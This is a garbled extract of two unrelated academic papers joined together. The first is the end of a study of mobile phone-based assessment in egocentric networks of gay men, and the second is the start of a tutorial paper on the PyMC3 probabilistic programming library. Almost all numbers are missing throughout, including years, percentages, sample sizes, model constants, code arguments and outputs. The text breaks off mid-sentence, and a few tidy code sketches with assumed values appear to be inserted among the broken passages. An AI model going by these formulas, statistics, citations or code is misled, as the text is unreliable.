partners for egos and ( . % and . % of the total communications, respectively). . . mobile health assessment we discuss two types of multi-level regression models that address research questions specific to each level of hierarchy in a longitudinal egocentric data set. network-level questions. holistic health approaches often track multiple and disparate measures of health. for example, le roux et al. ( ) examined mental health, general health, and hiv-transmission behaviors. in this vein, we examined how multiple health behaviors and hrqol cluster within networks. due to the small sample size, an ad hoc approach was used. responses for each individual were aggregated over their -day study period. we then fit separate multi-level models to each hrqol or behavioral measure. pearson product-moment correlations were then examined within the pairs of network-level random effects between all possible pairs of hrqol and behavioral outcomes. correlations were in expected directions. for example, at the network level, there were negative correlations between numbers of alcoholic beverages and both mean levels of healthy feelings (r = -. ) and days of exercise (r = -. ). a more formal modeling approach uses a bivariate-outcome multi-level model similar to comulada et al. ( , ). 
here we consider longitudinal egocentric data with two continuous outcome measures, e.g. levels of mood and sleep. for individual i in network n at time point t and outcome k (= , ), a bivariate random-intercept linear model on continuous outcome y_{nitk} is expressed as

y_{nitk} = x_{nitk}′ β_k + λ_{nk} + η_{nik} + ε_{nitk},   ( )

where β_k is a vector of regression coefficients for covariate vector x_{nitk} on outcome k. correlations for each outcome within networks and across repeated observations within individuals are accounted for by random effects λ_{nk} and η_{nik}, respectively. residual error term ε_{nitk} accounts for variance that is unexplained by the random effects. a key feature of the model is that correlations between outcomes are modeled through a variance-covariance matrix that is shared by random effects and residual terms across outcomes. in particular, cross-correlations can be examined between outcomes at different time points, e.g. the relationship between drug use and trust between egos and alters over several time points (comulada et al., ).
figure : percentage of (n) reciprocated calls or text messages:
individual-level questions. longitudinal studies typically entail a few time points. analyses focus on mean changes over time, e.g. decreases in drug use. ema in our study resulted in numerous time points (intensive longitudinal data; walls & shafer, ). in larger samples, changes in variability, as well as mean levels, can be examined using location scale models (hedeker, mermelstein, & demirtas, ; hedeker, demirtas, & mermelstein, ). for example, hedeker, demirtas, & mermelstein ( ) examined mood fluctuations in smokers over time.
. discussion
our mobile phone-based pilot study on egocentric networks of gay men and their peers highlights a number of benefits that are scalable to larger studies and other populations. first, recruitment and implementation of the study was carried out without in-person visits with study participants. second, participants used their own mobile phones, which alleviated the need to carry another electronic data-entry device. both features served to reduce participant burden and study costs that are associated with traditional studies, e.g. interviewers were not needed. a degree of anonymity was also provided for participants, which may be an important issue for marginalized populations. past ema studies have typically relied on paper diaries that are prone to backfilling (stone et al., , ). palm top computers address this issue, but still introduce a degree of user burden that can be attenuated by making use of an individual's own mobile phone.
furthermore, gay men in los angeles are often targeted for hiv-related studies, especially through grindr (e.g., rendina et al., ). at enrollment, a number of our study participants were already familiar with standard study protocols. these characteristics facilitated the use of online recruitment and mobile assessment. using these tools would be more difficult in other populations where study details are better explained in person and where study participants may be more reluctant to enter sensitive information during a survey, especially on an electronic device. few concerns were voiced by participants in our study. online recruitment may be unethical in populations were a language barrier is present, and online consent forms may be easy to click through without understanding the content. despite the technological savvy of our population, three main limitations remained with our study design. approximately half of the eligible gay men who clicked through our grindr banner ad and initiated the online forms, completed the study participation forms ( %; n = / ; figure ). this percentage is similar to initial participation rates that were found in another study that recruited gay men through grindr and asked them to fill out a one-time online survey ( %; n = / ; rendina et al., ). a big difference between rendina et al. ( ) and our study is that they retained % of the initial gay men in their analysis sample. we retained egos ( %) in our study. increasing rates of online recruitment offers potential participants a smorgasbord of studies to select from. moreover, there is less buy-in when shopping amongst online studies. for example, rapport may be established with a recruiter during recruitment in a clinic. online recruitment may be best suited for studies offering instant participation. recruitment through grindr reached gay men with risky sexual behavior profiles as intended; nineteen percent of interviewed gay men reported anonymous / one-time sex partners in their network during the telephone interview (n = of ). yet only one of the ( %) enrolled gay men had reported anonymous partners. though not statistically significant, this percentage drop suggests that an online forum that attracts users with a targeted behavior is not necessarily a good recruitment source. another limitation was our restriction of phone- log data collection to android users. in our study, the majority of participants were iphone users, e.g. % of egos and % of alters who filled out online forms. iphone users tend to have other iphone users as friends (canright, ). android and iphone users also tend to have different demographic and social characteristics (albanesius, ). phone log-based inference that is based on one type of mobile phone is likely to miss a connections insna.org | volume | issue | december mobile phone assessment in egocentric networks segment of the population and be biased. text message- based assessment that that does not require a smartphone may be a better option in other populations. lastly, lengthy assessments may call for larger computer screens and human interaction to encourage compliance. our mobile assessment could be taken in a few minutes. questions contained a few response categories and mostly fit on one screen. this may partly explain high compliance in our study (a median of days of reporting). the benefits and challenges in our study support a marriage of traditional and new data collection methods that is likely to remain in social network research. 
visual web interfaces that allow participants to construct their own personal networks through a self-administered social network inventory have met with limited success; an interviewer may still be necessary (matzat & snijders, ). moreover, one mode of electronic communication may not adequately capture social interaction (quintane & kleinbaum, ). that is why we assessed the frequency of ego-alter contacts through self-report and mobile communication. despite the challenges of incorporating new technologies into research, the social dynamics of mobile devices and social media are difficult to ignore. it is hard to fully understand the dynamics of health-related behaviors without them. references albanesius, c. ( ). infographic: what does the average android, ios user look like? pcmag. com. accessed october , . http://www. pcmag.com/article / , , , .asp. barrera jr., m., & gottlieb, b.h. ( ). social support in the adjustment of pregnant adolescents: assessment issues. in: gottlieb, b.h. (ed.), social networks and social support. sage publications, beverly hills, ca, pp. – . canright, g. ( ). who cares what kind of smartphone their friends have? conference presentation, international network for social network analysts, sunbelt xxxiii, may - , hamburg, germany. centers for disease control and prevention. ( ). http://www.cdc.gov/hrqol/hrqol _measure. htm. comulada, w.s., rotheram-borus, m.j., pequegnat, w., weiss, r.e., desmond, k.a., arnold, e.m., remien, r.h., morin, s.f., weinhardt, l.s., johnson, m.o., & chesney, m.a. ( ). relationships over time between mental health symptoms and transmission risk among persons living with hiv. psychology of addictive behaviors, , - . doi: . /a . comulada, w.s., muth, s.q., & latkin, c.a. ( ). the analysis of multiple ties in longitudinal egocentric network data: a case study on bidirectional relationships between trust and drug use. social networks, , - . fowler, j.h., & christakis, n.a. ( ). dynamic spread of happiness in a large social network: longitudinal analysis over years in the framingham heart study. british medical journal, , a . doi: . /bmj.a . freedman, m.j., lester, k.m., mcnamara, c., milby, j.b., & schumacher, j.e. ( ). cell phones for ecological momentary assessment with cocaine- addicted homeless patients in treatment. journal of substance abuse treatment, , - . fulkerson, j.a., nelson, m.c., lytle, l.a., moe, s., heitzler, c., & pasch, k.e. ( ). the validation of a home food inventory. international journal of behavioral nutrition and physical activity, , . hall, jeffrey, a. ( ). parents’ networks: egocentric networks and unique and shared sources of social support. connections, , - . heckathorn, d.d. ( ). respondent driven sampling: a new approach to the study of hidden populations. social problems, , - . heckathorn, d.d. ( ). respondent-driven sampling ii: deriving valid population estimates from chain-referral samples of hidden populations. social problems, , - . hedeker, d., mermelstein, r.j., & demirtas, h. ( ). an application of a mixed-effects location scale model for analysis of ecological momentary assessment (ema) data. biometrics, , - . hedeker, d., demirtas, h., & mermelstein, r. j. ( ). a mixed ordinal location scale model for analysis of ecological momentary assessment (ema) data. statistics and its interface, , - . heron, k.e., & smyth, j.m. ( ). ecological momentary interventions: incorporating mobile technology into psychosocial and health behaviour treatments. br j health psychol, (pt ), – . doi.org/ . / x . 
kaiser, l.l., megar-quiñonez, h., townsend, m.s., nicholson, y., fujii, m.l., martin, a.c., & lamp, c.l. ( ). food insecurity and food supplies in latino households with young children. journal of nutrition education and behavior, , - . connections december | issue | volume | insna.org mobile phone assessment in egocentric networks kissinger, p., rice, j., farley, t., trim, s., jewitt, k., margavio, v., & martin, d.h. ( ). application of computer-assisted interviews to sexual behavior research. american journal of epidemiology, , - . lazer, d., pentland, a(s)., adamic, l., aral, s., barabasi, a.l., brewer, d., christakis, n., contractor, n., fowler, j., gutmann, m., jebara, t., king, g., macy, m., roy, d., & van alstyne, m. ( ). life in the network: the coming age of computational social science. science, ( ), - . doi: . /science. . le roux, i.m., tomlinson, m., harwood, j.m., o’connor, m.j., worthman, c.m., mbewu, n., stewart, j., hartley, m., swendeman, d., comulada, w.s., weiss, r.e., & rotheram-borus, m.j. ( ). outcomes of home visits for pregnant mothers and their infants: a cluster randomized controlled trial. aids, , – . matzat, u., & snijders, c. ( ). the quality of ego- centered social network data in web surveys: experiments with a visual elicitation method. conference presentation, international network for social network analysts, sunbelt xxxiii, may - , hamburg, germany. onnela, j.p, saramäki, j., hyvönen, j., szabó, g., lazer, d., kaski, k., kertész, j., & barabási, a.-l. ( ). structure and tie strengths in mobile communication networks. proceedings of the national academy of sciences, ( ), - . quintane, e., & kleinbaum, a.m. ( ). matter over mind? e-mail data and the measurement of social networks. connections, ( ), - . ramanathan, n., swendeman, d., comulada, w.s., estrin, d., & rotheram-borus, m.j. ( ). identifying preferences for mobile health applications for self-monitoring and self-management: focus group findings from hiv-positive persons and young mothers. international journal of medical informatics, , e - . doi: . /j. ijmedinf. . . . rice, e., comulada, s., green, s., arnold, e.m., & rotheram-borus, m.j. ( ). differential disclosure across social network ties among women living with hiv. aids and behavior, , - . shiffman, s., stone, a.a., & hufford, m.r. ( ). ecological momentary assessment. annu rev clin psychol, , - . sisk, c., sharkey, j.r., mcintosh, w.a., & anding, j. ( ). using multiple household food inventories to measure food availability in the home over days: a pilot study. nutrition journal, , . doi: . / - - - . snijders, t., spreen, m., & zwaagstra, r. ( ). the use of multilevel modeling for analysing personal networks: networks of cocaine users in an urban area. journal of quantitative anthropology, , - . stone, a.a., & shiffman, s. ( ). ecological momentary assessment in behavioral medicine. annals of behavioral medicine, , - . stone, a. a., shiffman, s., schwartz, j. e., broderick, j. e., & hufford, m. r. ( ). patient non- compliance with paper diaries. bmj, , - . stone, a. a., shiffman, s., schwartz, j. e., broderick, j. e., & hufford, m. r. ( ). patient compliance with paper and electronic diaries. controlled clinical trials, , - . swendeman, d., comulada, w.s., ramanathan, n., lazar, m, & estrin, d. reliability and validity of daily self-monitoring by smartphone application for health-related quality of life, antiretroviral adherence, substance use, and sexual behaviors among people living with hiv. . ( ). aids & behavior, epub ahead of print. 
valente, t.w. ( ). social networks and health: models, methods, and applications. new york: oxford university press. pp. - . valente, t.w. ( ). network interventions. science, , - . walls, t.a., & shafer, j.l. ( ). models for intensive longitudinal data. oxford university press. yang, c., latkin, c., muth, s.q., & rudolph, a. ( ). injection drug users’ involvement in drug economy: dynamics of sociometric and egocentric social networks. connections, , - . ye, q., zhu, t., hu, d., wu, b., du, n., & wang, b. ( ). cell phone mini challenge award: social network accuracy – exploring temporal communication in mobile call graphs. ieee symposium on visual analytics science and technology, october - , columbus, ohio, usa. doi: . / vast. . . zhang, h., & dantu, r. ( ). predicting social ties in mobile phone networks. intelligence and security informatics (isi), may - , vancouver, bc, canada. doi: . /isi. . . submitted september accepted march published april corresponding author thomas v. wiecki, thomas.wiecki@gmail.com academic editor charles elkan additional information and declarations can be found on page doi . /peerj-cs. copyright salvatier et al. distributed under creative commons cc-by . open access probabilistic programming in python using pymc john salvatier , thomas v. wiecki and christopher fonnesbeck ai impacts, berkeley, ca, united states quantopian inc, boston, ma, united states department of biostatistics, vanderbilt university, nashville, tn, united states abstract probabilistic programming allows for automatic bayesian inference on user-defined probabilistic models. recent advances in markov chain monte carlo (mcmc) sampling allow inference on increasingly complex models. this class of mcmc, known as hamiltonian monte carlo, requires gradient information which is often not readily available. pymc is a new open source probabilistic programming framework written in python that uses theano to compute gradients via automatic differentiation as well as compile probabilistic programs on-the-fly to c for increased speed. contrary to other probabilistic programming languages, pymc allows model specification directly in python code. the lack of a domain specific language allows for great flexibility and direct interaction with the model. this paper is a tutorial-style introduction to this software package. subjects data mining and machine learning, data science, scientific computing and simulation keywords bayesian statistic, probabilistic programming, python, markov chain monte carlo, statistical modeling introduction probabilistic programming (pp) allows for flexible specification and fitting of bayesian statistical models. pymc is a new, open-source pp framework with an intuitive and readable, yet powerful, syntax that is close to the natural syntax statisticians use to describe models. it features next-generation markov chain monte carlo (mcmc) sampling algorithms such as the no-u-turn sampler (nuts) (hoffman & gelman, ), a self-tuning variant of hamiltonian monte carlo (hmc) (duane et al., ). this class of samplers works well on high dimensional and complex posterior distributions and allows many complex models to be fit without specialized knowledge about fitting algorithms. hmc and nuts take advantage of gradient information from the likelihood to achieve much faster convergence than traditional sampling methods, especially for larger models. 
nuts also has several self-tuning strategies for adaptively setting the tunable parameters of hamiltonian monte carlo, which means specialized knowledge about how the algorithms work is not required. pymc , stan (stan development team, ), and the laplacesdemon package for r are currently the only pp packages to offer hmc. a number of probabilistic programming languages and systems have emerged over the past – decades. one of the earliest to enjoy widespread usage was the bugs language (spiegelhalter et al., ), which allows for the easy specification of bayesian models and fitting them via markov chain monte carlo methods. newer, more expressive languages have allowed for the creation of factor graphs and probabilistic graphical models. each of these systems is a domain-specific language built on top of an existing low-level language; notable examples include church (goodman et al., ) (derived from scheme), anglican (wood, van de meent & mansinghka, ) (integrated with clojure and compiled with a java virtual machine), venture (mansinghka, selsam & perov, ) (built from c++), infer.net (minka et al., ) (built upon the .net framework), figaro (pfeffer, ) (embedded into scala), webppl (goodman & stuhlmüller, ) (embedded into javascript), picture (kulkarni et al., ) (embedded into julia), and quicksand (ritchie, ) (embedded into lua). probabilistic programming in python (python software foundation, ) confers a number of advantages including multi-platform compatibility, an expressive yet clean and readable syntax, easy integration with other scientific libraries, and extensibility via c, c++, fortran or cython (behnel et al., ). these features make it straightforward to write and use custom statistical distributions, samplers and transformation functions, as required by bayesian analysis. while most of pymc's user-facing features are written in pure python, it leverages theano (bergstra et al., ; bastien et al., ) to transparently transcode models to c and compile them to machine code, thereby boosting performance. theano is a library that allows expressions to be defined using generalized vector data structures called tensors, which are tightly integrated with the popular numpy (van der walt, colbert, varoquaux, ) ndarray data structure, and similarly allow for broadcasting and advanced indexing, just as numpy arrays do. theano also automatically optimizes the likelihood's computational graph for speed and provides simple gpu integration. here, we present a primer on the use of pymc for solving general bayesian statistical inference and prediction problems. we will first describe basic pymc usage, including installation, data creation, model definition, model fitting and posterior analysis. we will then employ two case studies to illustrate how to define and fit more sophisticated models. finally, we will show how pymc can be extended and discuss more advanced features, such as the generalized linear models (glm) subpackage, custom distributions, custom transformations and alternative storage backends.
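as a minimal illustration of the theano layer just described (a sketch for orientation only, not part of the example that follows), a symbolic expression can be defined, compiled to a callable function, and differentiated automatically:

import theano
import theano.tensor as T

# a symbolic vector and a scalar expression built from it
x = T.dvector('x')
y = (x ** 2).sum()

# compile the expression graph to an optimized callable
f = theano.function([x], y)
print(f([1.0, 2.0, 3.0]))    # 14.0

# gradients come from automatic differentiation of the same graph
g = theano.function([x], theano.grad(y, x))
print(g([1.0, 2.0, 3.0]))    # [2. 4. 6.]

this is the mechanism that lets the gradient-based samplers discussed below run without any user-supplied derivatives.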
installation running pymc requires a working python interpreter (python software foundation, ), either version . (or more recent) or . (or more recent); we recommend that new users install version . . a complete python installation for mac osx, linux and windows can most easily be obtained by downloading and installing the free anacondapythondistribution by continuumio. pymc can be installed using ‘pip‘: pip install git+https://github.com/pymc-devs/pymc pymc depends on several third-party python packages which will be automatically installed when installing via pip. the four required dependencies are: theano, numpy, salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://store.continuum.io/cshop/anaconda/ http://dx.doi.org/ . /peerj-cs. scipy, and matplotlib. to take full advantage of pymc , the optional dependencies pandas and patsy should also be installed. pip install patsy pandas the source code for pymc is hosted on github at https://github.com/pymc- devs/pymc and is distributed under the liberal apachelicense . . on the github site, users may also report bugs and other issues, as well as contribute code to the project, which we actively encourage. comprehensive documentation is readily available at http://pymc-devs.github.io/pymc /. a motivating example: linear regression to introduce model definition, fitting and posterior analysis, we first consider a simple bayesian linear regression model with normal priors on the parameters. we are interested in predicting outcomes y as normally-distributed observations with an expected value µ that is a linear function of two predictor variables, x and x . y ∼n(µ,σ ) µ=α+β x +β x where α is the intercept, and βi is the coefficient for covariate xi, while σ represents the observation or measurement error. we will apply zero-mean normal priors with variance of to both regression coefficients, which corresponds to weak information regarding the true parameter values. since variances must be positive, we will also choose a half-normal distribution (normal distribution bounded below at zero) as the prior for σ . α∼n( , ) βi∼n( , ) σ ∼|n( , )|. generating data we can simulate some data from this model using numpy’s random module, and then use pymc to try to recover the corresponding parameters. the following code implements this simulation, and the resulting data are shown in fig. : import numpy as np import matplotlib.pyplot as plt # intialize random number generator np.random.seed( ) # true parameter values alpha, sigma = , beta = [ , . ] salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/pymc-devs/pymc https://github.com/pymc-devs/pymc https://github.com/pymc-devs/pymc /blob/master/license http://pymc-devs.github.io/pymc / http://dx.doi.org/ . /peerj-cs. figure simulated regression data. # size of dataset size = # predictor variable x = np.linspace( , , size) x = np.linspace( ,. , size) # simulate outcome variable y = alpha + beta[ ]*x + beta[ ]*x + np.random.randn(size)*sigma model specification specifying this model in pymc is straightforward because the syntax is similar to the statistical notation. for the most part, each line of python code corresponds to a line in the model notation above. first, we import the components we will need from pymc . 
from pymc import model, normal, halfnormal the following code implements the model in pymc: basic_model = model() with basic_model: # priors for unknown model parameters alpha = normal(’alpha’, mu= , sd= ) beta = normal(’beta’, mu= , sd= , shape= ) sigma = halfnormal(’sigma’, sd= ) # expected value of outcome mu = alpha + beta[ ]*x + beta[ ]*x salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. # likelihood (sampling distribution) of observations y_obs = normal(’y_obs’, mu=mu, sd=sigma, observed=y) the first line, basic_model = model() creates a new model object which is a container for the model random variables. following instantiation of the model, the subsequent specification of the model components is performed inside a with statement: with basic_model: this creates a context manager, with our basic_model as the context, that includes all statements until the indented block ends. this means all pymc objects introduced in the indented code block below the with statement are added to the model behind the scenes. absent this context manager idiom, we would be forced to manually associate each of the variables with basic_model as they are created, which would result in more verbose code. if you try to create a new random variable outside of a model context manger, it will raise an error since there is no obvious model for the variable to be added to. the first three statements in the context manager create stochastic random variables with normal prior distributions for the regression coefficients, and a half-normal distribution for the standard deviation of the observations, σ . alpha = normal(’alpha’, mu= , sd= ) beta = normal(’beta’, mu= , sd= , shape= ) sigma = halfnormal(’sigma’, sd= ) these are stochastic because their values are partly determined by its parents in the dependency graph of random variables, which for priors are simple constants, and are partly random, according to the specified probability distribution. the normal constructor creates a normal random variable to use as a prior. the first argument for random variable constructors is always the name of the variable, which should almost always match the name of the python variable being assigned to, since it can be used to retrieve the variable from the model when summarizing output. the remaining required arguments for a stochastic object are the parameters, which in the case of the normal distribution are the mean mu and the standard deviation sd, which we assign hyperparameter values for the model. in general, a distribution’s parameters are values that determine the location, shape or scale of the random variable, depending on the parameterization of the distribution. most commonly used distributions, such as beta, exponential, categorical, gamma, binomial and others, are available as pymc objects, and do not need to be manually coded by the user. the beta variable has an additional shape argument to denote it as a vector-valued parameter of size . the shape argument is available for all distributions and specifies the length or shape of the random variable; when unspecified, it defaults to a value of one (i.e., a scalar). it can be an integer to specify an array, or a tuple to specify a multidimensional salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. array. for example, shape=( , ) makes random variable that takes a by matrix as its value. 
detailed notes about distributions, sampling methods and other pymc functions are available via the help function. help(normal) help on class normal in module pymc .distributions.continuous: class normal(pymc .distributions.distribution.continuous) | normal log-likelihood. | | .. math:: ight\} | | parameters | ---------- | mu : float | mean of the distribution. | tau : float | precision of the distribution, which corresponds to | :math:‘ /\sigma^ ‘ (tau > ). | sd : float | standard deviation of the distribution. alternative parameterization. | | .. note:: | - :math:‘e(x) = \mu‘ | - :math:‘var(x) = / \tau‘ having defined the priors, the next statement creates the expected value mu of the outcomes, specifying the linear relationship: mu = alpha + beta[ ]*x + beta[ ]*x this creates a deterministic random variable, which implies that its value is completely determined by its parents’ values. that is, there is no uncertainty in the variable beyond that which is inherent in the parents’ values. here, mu is just the sum of the intercept alpha and the two products of the coefficients in beta and the predictor variables, whatever their current values may be. pymc random variables and data can be arbitrarily added, subtracted, divided, or multiplied together, as well as indexed (extracting a subset of values) to create new random variables. many common mathematical functions like sum, sin, exp and linear algebra functions like dot (for inner product) and inv (for inverse) are also provided. applying operators and functions to pymc objects results in tremendous model expressivity. the final line of the model defines y_obs, the sampling distribution of the response data. y_obs = normal(’y_obs’, mu=mu, sd=sigma, observed=y) this is a special case of a stochastic variable that we call an observed stochastic, and it is the data likelihood of the model. it is identical to a standard stochastic, except that salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. its observed argument, which passes the data to the variable, indicates that the values for this variable were observed, and should not be changed by any fitting algorithm applied to the model. the data can be passed in the form of either a numpy.ndarray or pandas.dataframe object. notice that, unlike the prior distributions, the parameters for the normal distribution of y_obs are not fixed values, but rather are the deterministic object mu and the stochastic sigma. this creates parent-child relationships between the likelihood and these two variables, as part of the directed acyclic graph of the model. model fitting having completely specified our model, the next step is to obtain posterior estimates for the unknown variables in the model. ideally, we could derive the posterior estimates analytically, but for most non-trivial models this is not feasible. we will consider two approaches, whose appropriateness depends on the structure of the model and the goals of the analysis: finding the maximum a posteriori (map) point using optimization methods, and computing summaries based on samples drawn from the posterior distribution using mcmc sampling methods. maximum a posteriori methods the maximum a posteriori (map) estimate for a model, is the mode of the posterior distribution and is generally found using numerical optimization methods. this is often fast and easy to do, but only gives a point estimate for the parameters and can be misleading if the mode isn’t representative of the distribution. 
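before turning to fitting, it may help to restate the whole example as one self-contained sketch; the seed, sample size, true parameter values and prior scales below are illustrative assumptions rather than the exact figures used in the example, and the package import name is pymc3:

import numpy as np
from pymc3 import Model, Normal, HalfNormal

# simulate data from the linear model y = alpha + beta1*x1 + beta2*x2 + noise
np.random.seed(123)                       # assumed seed
size = 100                                # assumed sample size
alpha_true, sigma_true = 1.0, 1.0         # assumed true intercept and noise sd
beta_true = [1.0, 2.5]                    # assumed true slopes

x1 = np.linspace(0, 1, size)
x2 = np.linspace(0, 0.2, size)
y = (alpha_true + beta_true[0] * x1 + beta_true[1] * x2
     + np.random.randn(size) * sigma_true)

# specify the model: normal priors on coefficients, half-normal prior on sigma
basic_model = Model()
with basic_model:
    alpha = Normal('alpha', mu=0, sd=10)            # prior sd assumed
    beta = Normal('beta', mu=0, sd=10, shape=2)     # vector of two coefficients
    sigma = HalfNormal('sigma', sd=1)               # prior sd assumed

    # deterministic expected value of the outcome
    mu = alpha + beta[0] * x1 + beta[1] * x2

    # observed stochastic: the data likelihood
    y_obs = Normal('y_obs', mu=mu, sd=sigma, observed=y)

nothing is fitted at this point; the model object simply records the variables and the relationships between them.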
pymc provides this functionality with the find_map function. below we find the map for our original model. the map is returned as a parameter point, which is always represented by a python dictionary of variable names to numpy arrays of parameter values. from pymc import find_map map_estimate = find_map(model=basic_model) print(map_estimate) {‘alpha’: array( . ), ‘beta’: array([ . , . ]), ‘sigma_log’: array( . )} by default, find_map uses the broyden–fletcher–goldfarb–shanno (bfgs) optimization algorithm to find the maximum of the log-posterior but also allows selection of other optimization algorithms from the scipy.optimize module. for example, below we use powell’s method to find the map. from scipy import optimize salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. map_estimate = find_map(model=basic_model, fmin=optimize.fmin_powell) print(map_estimate) {’alpha’: array( . ), ’beta’: array([ . , . ]), ’sigma_log’: array( . )} it is important to note that the map estimate is not always reasonable, especially if the mode is at an extreme. this can be a subtle issue; with high dimensional posteriors, one can have areas of extremely high density but low total probability because the volume is very small. this will often occur in hierarchical models with the variance parameter for the random effect. if the individual group means are all the same, the posterior will have near infinite density if the scale parameter for the group means is almost zero, even though the probability of such a small scale parameter will be small since the group means must be extremely close together. also, most techniques for finding the map estimate only find a local optimium (which is often good enough), and can therefore fail badly for multimodal posteriors if the different modes are meaningfully different. sampling methods though finding the map is a fast and easy way of obtaining parameter estimates of well-behaved models, it is limited because there is no associated estimate of uncertainty produced with the map estimates. instead, a simulation-based approach such as mcmc can be used to obtain a markov chain of values that, given the satisfaction of certain conditions, are indistinguishable from samples from the posterior distribution. to conduct mcmc sampling to generate posterior samples in pymc , we specify a step method object that corresponds to a single iteration of a particular mcmc algorithm, such as metropolis, slice sampling, or the no-u-turn sampler (nuts). pymc ’s step_methods submodule contains the following samplers: nuts, metropolis, slice, hamiltonianmc, and binarymetropolis. gradient-based sampling methods pymc implements several standard sampling algorithms, such as adaptive metropolis- hastings and adaptive slice sampling, but pymc ’s most capable step method is the no-u-turn sampler. nuts is especially useful for sampling from models that have many continuous parameters, a situation where older mcmc algorithms work very slowly. it takes advantage of information about where regions of higher probability are, based on the gradient of the log posterior-density. this helps it achieve dramatically faster convergence on large problems than traditional sampling methods achieve. pymc relies on theano to analytically compute model gradients via automatic differentiation of the posterior density. nuts also has several self-tuning strategies for adaptively setting the tunable parameters of hamiltonian monte carlo. 
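collecting the map and sampling steps for the regression model into a single sketch (the number of draws is an arbitrary illustrative value):

from scipy import optimize
from pymc3 import find_MAP, NUTS, sample

with basic_model:
    # locate the posterior mode, here with powell's method
    start = find_MAP(fmin=optimize.fmin_powell)

    # nuts uses the map point to choose a reasonable scaling vector
    step = NUTS(scaling=start)

    # draw posterior samples (2000 is an assumed draw count)
    trace = sample(2000, step, start=start)

the returned trace object maps variable names to arrays of samples and is the input to the plotting and summary functions described next.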
for random variables that are undifferentiable (namely, discrete variables) nuts cannot be used, but it may still be used on the differentiable variables in a model that contains undifferentiable variables. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. nuts requires a scaling matrix parameter, which is analogous to the variance parameter for the jump proposal distribution in metropolis-hastings, although nuts uses it somewhat differently. the matrix gives an approximate shape of the posterior distribution, so that nuts does not make jumps that are too large in some directions and too small in other directions. it is important to set this scaling parameter to a reasonable value to facilitate efficient sampling. this is especially true for models that have many unobserved stochastic random variables or models with highly non-normal posterior distributions. poor scaling parameters will slow down nuts significantly, sometimes almost stopping it completely. a reasonable starting point for sampling can also be important for efficient sampling, but not as often. fortunately, nuts can often make good guesses for the scaling parameters. if you pass a point in parameter space (as a dictionary of variable names to parameter values, the same format as returned by find_map) to nuts, it will look at the local curvature of the log posterior-density (the diagonal of the hessian matrix) at that point to guess values for a good scaling vector, which can result in a good value. the map estimate is often a good point to use to initiate sampling. it is also possible to supply your own vector or scaling matrix to nuts. additionally, the find_hessian or find_hessian_diag functions can be used to modify a hessian at a specific point to be used as the scaling matrix or vector. here, we will use nuts to sample draws from the posterior using the map as the starting and scaling point. sampling must also be performed inside the context of the model. from pymc import nuts, sample with basic_model: # obtain starting values via map start = find_map(fmin=optimize.fmin_powell) # instantiate sampler step = nuts(scaling=start) # draw posterior samples trace = sample( , step, start=start) [----------------- %-----------------] of complete in . sec the sample function runs the step method(s) passed to it for the given number of iterations and returns a trace object containing the samples collected, in the order they were collected. the trace object can be queried in a similar way to a dict containing a map from variable names to numpy.arrays. the first dimension of the array is the sampling index and the later dimensions match the shape of the variable. we can extract the last values for the alpha variable as follows trace[’alpha’][- :] salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. array([ . , . , . , . , . ]) posterior analysis pymc provides plotting and summarization functions for inspecting the sampling output. a simple posterior plot can be created using traceplot, its output is shown in fig. . from pymc import traceplot traceplot(trace) the left column consists of a smoothed histogram (using kernel density estimation) of the marginal posteriors of each stochastic random variable while the right column contains the samples of the markov chain plotted in sequential order. 
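alongside the graphical output, the trace can be inspected numerically; a brief sketch (the slice length shown is an arbitrary choice):

from pymc3 import summary

# the trace behaves like a dict of sample arrays, e.g. the last five draws of alpha
print(trace['alpha'][-5:])

# text-based posterior summary for a single variable
summary(trace['alpha'])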
the beta variable, being vector-valued, produces two histograms and two sample traces, corresponding to both predictor coefficients. for a tabular summary, the summary function provides a text-based output of common posterior statistics: from pymc import summary summary(trace[’alpha’]) alpha: mean sd mc error % hpd interval ------------------------------------------------------------------- . . . [ . , . ] posterior quantiles: . . |--------------|==============|==============|--------------| . . . . . case study : stochastic volatility we present a case study of stochastic volatility, time varying stock market volatility, to illustrate pymc ’s capability for addressing more realistic problems. the distribution of market returns is highly non-normal, which makes sampling the volatilities significantly more difficult. this example has + parameters so using older sampling algorithms like metropolis-hastings would be inefficient, generating highly auto-correlated samples with a low effective sample size. instead, we use nuts, which is dramatically more efficient. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . . . . . . . . . . . . . . . . . . fr eq ue nc y alpha . . . . . . . . . s am pl e va lu e alpha . . . . . . . . . . . . . . . . . . . . fr eq ue nc y beta . . . . . . . . . . s am pl e va lu e beta . . . . . . . fr eq ue nc y sigma_log . . . . . . . s am pl e va lu e sigma_log . . . . . . . . fr eq ue nc y sigma . . . . . . . . s am pl e va lu e sigma figure kernel density estimates and simulated trace for each variable in the linear regression model. the model asset prices have time-varying volatility (variance of day over day returns). in some periods, returns are highly variable, while in others they are very stable. stochastic volatility models address this with a latent volatility variable, which is allowed to change over time. the following model is similar to the one described in the nuts paper (hoffman & gelman, , p. ). σ ∼exp( ) ν∼exp(. ) si∼n(si− ,σ− ) log(yi)∼t(ν, ,exp(− si)). here, y is the response variable, a daily return series which we model with a student-t distribution having an unknown degrees of freedom parameter, and a scale parameter determined by a latent process s. the individual si are the individual daily log volatilities in the latent log volatility process. salvatier et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure historical daily returns of the s&p during the financial crisis. the data our data consist of daily returns of the s&p during the financial crisis. import pandas as pd returns = pd.read_csv(’data/sp .csv’, index_col= , parse_dates=true) see fig. for a plot of the daily returns data. as can be seen, stock market volatility increased remarkably during the financial crisis. model implementation as with the linear regression example, implementing the model in pymc mirrors its statistical specification. this model employs several new distributions: the exponential distribution for the ν and σ priors, the student-t (studentt) distribution for distribution of returns, and the gaussianrandomwalk for the prior for the 